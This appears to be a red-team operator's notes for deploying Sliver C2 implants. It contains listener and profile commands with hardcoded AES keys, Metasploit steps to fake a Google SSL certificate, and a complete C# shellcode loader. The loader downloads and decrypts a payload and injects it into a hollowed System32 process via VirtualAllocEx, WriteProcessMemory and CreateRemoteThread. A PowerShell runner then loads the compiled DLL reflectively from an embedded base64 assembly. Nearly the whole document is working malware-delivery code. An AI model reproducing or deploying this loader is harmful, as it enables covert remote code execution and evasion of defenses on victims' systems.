Stager and Shellcodes
Create a profile
profiles new -b https://10.10.15.207:443 --skip-symbols --format shellcode --arch amd64 local
profiles new -b https://10.0.0.241:443 --skip-symbols --format shellcode --arch x86 local_x86
Creating a certificate for impersonating ssl
use auxiliary/gather/impersonate_ssl
set RHOST www.google.com
run
sudo cp /root/.msf4/loot/20240210195945_default_172.217.1.4_172.217.1.4_key_007914.key .
sudo cp /root/.msf4/loot/20240210195945_default_172.217.1.4_172.217.1.4_cert_725923.crt .
sudo cp /root/.msf4/loot/20240210195945_default_172.217.1.4_172.217.1.4_pem_052506.pem .
- Rename files for ease of access.
Starting https listener
https -L 192.168.45.195 -l 443 -c /home/jay/sliver/crt.crt -k /home/jay/sliver/key.key
Starting stage listener (Use both)
stage-listener --url https://10.10.15.207:8443 --profile local -c /home/jay/sliver/crt.crt -k /home/jay/sliver/key.key -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV
stage-listener --url https://10.0.0.241:8443 --profile local_x86l -c /home/jay/sliver/crt.crt -k /home/jay/sliver/key.key -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV
Shell Code Runner
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.IO.Compression;
namespace Sl1verLoader
{
public class Program
{
private static string AESKey;
private static string AESIV;
[StructLayout(LayoutKind.Sequential)]
public class SecurityAttributes
{
public Int32 Length = 0;
public IntPtr lpSecurityDescriptor = IntPtr.Zero;
public bool bInheritHandle = false;
public SecurityAttributes()
{
this.Length = Marshal.SizeOf(this);
}
}
[StructLayout(LayoutKind.Sequential)]
public struct ProcessInformation
{
public IntPtr hProcess;
public IntPtr hThread;
public Int32 dwProcessId;
public Int32 dwThreadId;
}
[Flags]
public enum CreateProcessFlags : uint
{
DEBUG_PROCESS = 0x00000001,
DEBUG_ONLY_THIS_PROCESS = 0x00000002,
CREATE_SUSPENDED = 0x00000004,
DETACHED_PROCESS = 0x00000008,
CREATE_NEW_CONSOLE = 0x00000010,
NORMAL_PRIORITY_CLASS = 0x00000020,
IDLE_PRIORITY_CLASS = 0x00000040,
HIGH_PRIORITY_CLASS = 0x00000080,
REALTIME_PRIORITY_CLASS = 0x00000100,
CREATE_NEW_PROCESS_GROUP = 0x00000200,
CREATE_UNICODE_ENVIRONMENT = 0x00000400,
CREATE_SEPARATE_WOW_VDM = 0x00000800,
CREATE_SHARED_WOW_VDM = 0x00001000,
CREATE_FORCEDOS = 0x00002000,
BELOW_NORMAL_PRIORITY_CLASS = 0x00004000,
ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000,
INHERIT_PARENT_AFFINITY = 0x00010000,
INHERIT_CALLER_PRIORITY = 0x00020000,
CREATE_PROTECTED_PROCESS = 0x00040000,
EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
PROCESS_MODE_BACKGROUND_BEGIN = 0x00100000,
PROCESS_MODE_BACKGROUND_END = 0x00200000,
CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
CREATE_DEFAULT_ERROR_MODE = 0x04000000,
CREATE_NO_WINDOW = 0x08000000,
PROFILE_USER = 0x10000000,
PROFILE_KERNEL = 0x20000000,
PROFILE_SERVER = 0x40000000,
CREATE_IGNORE_SYSTEM_DEFAULT = 0x80000000,
}
[StructLayout(LayoutKind.Sequential)]
public class StartupInfo
{
public Int32 cb = 0;
public IntPtr lpReserved = IntPtr.Zero;
public IntPtr lpDesktop = IntPtr.Zero;
public IntPtr lpTitle = IntPtr.Zero;
public Int32 dwX = 0;
public Int32 dwY = 0;
public Int32 dwXSize = 0;
public Int32 dwYSize = 0;
public Int32 dwXCountChars = 0;
public Int32 dwYCountChars = 0;
public Int32 dwFillAttribute = 0;
public Int32 dwFlags = 0;
public Int16 wShowWindow = 0;
public Int16 cbReserved2 = 0;
public IntPtr lpReserved2 = IntPtr.Zero;
public IntPtr hStdInput = IntPtr.Zero;
public IntPtr hStdOutput = IntPtr.Zero;
public IntPtr hStdError = IntPtr.Zero;
public StartupInfo()
{
this.cb = Marshal.SizeOf(this);
}
}
[DllImport("kernel32.dll")]
public static extern IntPtr CreateProcessA(String lpApplicationName, String lpCommandLine, SecurityAttributes lpProcessAttributes, SecurityAttributes lpThreadAttributes, Boolean bInheritHandles, CreateProcessFlags dwCreationFlags,
IntPtr lpEnvironment,
String lpCurrentDirectory,
[In] StartupInfo lpStartupInfo,
out ProcessInformation lpProcessInformation
);
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] buffer, IntPtr dwSize, int lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static UInt32 MEM_COMMIT = 0x1000;
public static void DownloadAndExecute(string url, string TargetBinary, string CompressionAlgorithm,byte[] AESKey,byte[] AESIV)
{
ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;
System.Net.WebClient client = new WebClientWithTimeout();
byte[] encrypted = client.DownloadData(url);
List<byte> l = new List<byte> { };
byte[] actual;
byte[] compressed;
if (AESKey != null && AESIV != null)
{
for (int i = 16; i <= encrypted.Length - 1; i++)
{
l.Add(encrypted[i]);
}
actual = l.ToArray();
compressed = Decrypt(actual, AESKey, AESIV);
}
else
{
compressed = encrypted;
}
byte[] sc = Decompress(compressed, CompressionAlgorithm);
string binary = TargetBinary;
Int32 size = sc.Length;
StartupInfo sInfo = new StartupInfo();
sInfo.dwFlags = 0;
ProcessInformation pInfo;
string binaryPath = "C:\\Windows\\System32\\" + binary;
IntPtr funcAddr = CreateProcessA(binaryPath, null, null, null, true, CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo);
IntPtr hProcess = pInfo.hProcess;
IntPtr spaceAddr = VirtualAllocEx(hProcess, new IntPtr(0), size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
int test = 0;
IntPtr size2 = new IntPtr(sc.Length);
bool bWrite = WriteProcessMemory(hProcess, spaceAddr, sc, size2, test);
CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0));
return;
}
public static byte[] Decompress(byte[] data, string CompressionAlgorithm)
{
byte[] decompressedArray = null;
if (CompressionAlgorithm == "deflate9")
{
using (MemoryStream decompressedStream = new MemoryStream())
{
using (MemoryStream compressStream = new MemoryStream(data))
{
using (DeflateStream deflateStream = new DeflateStream(compressStream, CompressionMode.Decompress))
{
deflateStream.CopyTo(decompressedStream);
}
}
decompressedArray = decompressedStream.ToArray();
}
return decompressedArray;
}
else if (CompressionAlgorithm == "gzip")
{
using (MemoryStream decompressedStream = new MemoryStream())
{
using (MemoryStream compressStream = new MemoryStream(data))
{
using (GZipStream gzipStream = new GZipStream(compressStream, CompressionMode.Decompress))
{
gzipStream.CopyTo(decompressedStream);
}
}
decompressedArray = decompressedStream.ToArray();
}
return decompressedArray;
}
else
{
return data;
}
}
public static byte[] Decrypt(byte[] ciphertext, byte[] AESKey, byte[] AESIV)
{
byte[] key = AESKey;
byte[] IV = AESIV;
using (Aes aesAlg = Aes.Create())
{
aesAlg.Key = key;
aesAlg.IV = IV;
aesAlg.Padding = PaddingMode.None;
ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);
using (MemoryStream memoryStream = new MemoryStream(ciphertext))
{
using (CryptoStream cryptoStream = new CryptoStream(memoryStream, decryptor, CryptoStreamMode.Write))
{
cryptoStream.Write(ciphertext, 0, ciphertext.Length);
return memoryStream.ToArray();
}
}
}
}
public class WebClientWithTimeout : WebClient
{
protected override WebRequest GetWebRequest(Uri address)
{
WebRequest wr = base.GetWebRequest(address);
wr.Timeout = 50000000; // timeout in milliseconds (ms)
return wr;
}
}
}
}How to generate dll
- Open Visual Studio Code
- Create a new Project
- Select Class Library (.Net Framework)
- paste the code
- Build( We might need to select the arch)
Writing the Powershell Shellcode Runner
- First we will have to copy the raw bytes of the assembly , for that we will use this Powershell command(this will copy the data to your clipboard):
get-content -Encoding byte -path .\ClassLibrary1.dll | clip
get-content -Encoding byte -path .\ClassLibrary1_x86.dll | clip
Pasting it in Cyber chef with two recipe
Copy the base64 string and paste it on this template script:
$encodeStr = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...etc"
$decodeStr = [System.Convert]::FromBase64String($encodeStr)
[System.Reflection.Assembly]::Load($decodeStr)
$url = #stage listener url
$TargetBinary = #the binarry to hollow and inject shellcode into (svchost.exe as an example)
[byte[]]$AESKey =
[byte[]]$AESIV =
$CompressionAlgorithm = "deflate9" # gzip, leave empty for no decompression
[Sl1verLoader.Program]::DownloadAndExecute($url,$TargetBinary,$CompressionAlgorithm,$AESKey,$AESIV)#lunch the method
convert the keys to raw bytes , use the following recipe on cyberchef
Use the aes keys we used while creating our staged listener
Final Shellcode runner
$encodeStr = "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AAEJALIDAQAEgAAAAQAAAAAAAAAAAAAAAAAuAAAABAAAAAAAAAAAAAAA9QBoAwAAAAAEAAAAAAAAAAAAAAD1AJcHAAAAAAMAAgAEAAIABQACAAYAAgAHAAIACAACAF0A5ABdAOkAAAAAPD45X18xMl8wADxEb3dubG9hZEFuZEV4ZWN1dGU+Yl9fMTJfMABMaXN0YDEAQ2xhc3NMaWJyYXJ5MQBjYlJlc2VydmVkMgBscFJlc2VydmVkMgA8PjkAPE1vZHVsZT4AQ3JlYXRlUHJvY2Vzc0EAQ1JFQVRFX0JSRUFLQVdBWV9GUk9NX0pPQgBDUkVBVEVfU1VTUEVOREVEAFBST0NFU1NfTU9ERV9CQUNLR1JPVU5EX0VORABDUkVBVEVfREVGQVVMVF9FUlJPUl9NT0RFAENSRUFURV9ORVdfQ09OU09MRQBQQUdFX0VYRUNVVEVfUkVBRFdSSVRFAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBTeXN0ZW0uSU8AQ1JFQVRFX05FV19QUk9DRVNTX0dST1VQAFBST0ZJTEVfVVNFUgBQUk9GSUxFX1NFUlZFUgBDUkVBVEVfRk9SQ0VET1MASURMRV9QUklPUklUWV9DTEFTUwBSRUFMVElNRV9QUklPUklUWV9DTEFTUwBISUdIX1BSSU9SSVRZX0NMQVNTAEFCT1ZFX05PUk1BTF9QUklPUklUWV9DTEFTUwBCRUxPV19OT1JNQUxfUFJJT1JJVFlfQ0xBU1MAREVUQUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJPQ0VTUwBNRU1fQ09NTUlUAENSRUFURV9JR05PUkVfU1lTVEVNX0RFRkFVTFQAQ1JFQVRFX1VOSUNPREVfRU5WSVJPTk1FTlQARVhURU5ERURfU1RBUlRVUElORk9fUFJFU0VOVABBRVNJVgBnZXRfSVYAc2V0X0lWAENSRUFURV9OT19XSU5ET1cAZHdYAElOSEVSSVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAERvd25sb2FkRGF0YQBkYXRhAGNiAG1zY29ybGliADw+YwBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBscFRocmVhZElkAGR3VGhyZWFkSWQAZHdQcm9jZXNzSWQAQ3JlYXRlUmVtb3RlVGhyZWFkAGhUaHJlYWQAQWRkAGxwUmVzZXJ2ZWQAUGFkZGluZ01vZGUAQ3J5cHRvU3RyZWFtTW9kZQBDb21wcmVzc2lvbk1vZGUASURpc3Bvc2FibGUAYkluaGVyaXRIYW5kbGUAbHBUaXRsZQBscEFwcGxpY2F0aW9uTmFtZQBscENvbW1hbmRMaW5lAENvbWJpbmUAVmFsdWVUeXBlAGZsQWxsb2NhdGlvblR5cGUARGlzcG9zZQBYNTA5Q2VydGlmaWNhdGUAY2VydGlmaWNhdGUAQ3JlYXRlAERlbGVnYXRlAFdyaXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBEb3dubG9hZEFuZEV4ZWN1dGUAZHdYU2l6ZQBkd1lTaXplAGR3U3RhY2tTaXplAGR3U2l6ZQBTaXplT2YAc2V0X1BhZGRpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBTdHJpbmcATGVuZ3RoAFVyaQBSZW1vdGVDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjawBnZXRfU2VydmVyQ2VydGlmaWNhdGVWYWxpZGF0aW9uQ2FsbGJhY2sAc2V0X1NlcnZlckNlcnRpZmljYXRlVmFsaWRhdGlvbkNhbGxiYWNrAE1hcnNoYWwAQ2xhc3NMaWJyYXJ5MS5kbGwAa2VybmVsMzIuZGxsAHVybABEZWZsYXRlU3RyZWFtAENyeXB0b1N0cmVhbQBHWmlwU3RyZWFtAE1lbW9yeVN0cmVhbQBQcm9ncmFtAFN5c3RlbQBTeW1tZXRyaWNBbGdvcml0aG0AQ29tcHJlc3Npb25BbGdvcml0aG0ASUNyeXB0b1RyYW5zZm9ybQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AWDUwOUNoYWluAGNoYWluAFN5c3RlbS5JTy5Db21wcmVzc2lvbgBscFByb2Nlc3NJbmZvcm1hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBDb3B5VG8AbHBTdGFydHVwSW5mbwBaZXJvAGxwRGVza3RvcABTbDF2ZXJMb2FkZXIAc2VuZGVyAGJ1ZmZlcgBTZXJ2aWNlUG9pbnRNYW5hZ2VyAGxwUGFyYW1ldGVyAGhTdGRFcnJvcgAuY3RvcgAuY2N0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IAQ3JlYXRlRGVjcnlwdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MAQWVzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGJJbmhlcml0SGFuZGxlcwBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5Llg1MDlDZXJ0aWZpY2F0ZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBkd1hDb3VudENoYXJzAGR3WUNvdW50Q2hhcnMAU3NsUG9saWN5RXJyb3JzAHNzbFBvbGljeUVycm9y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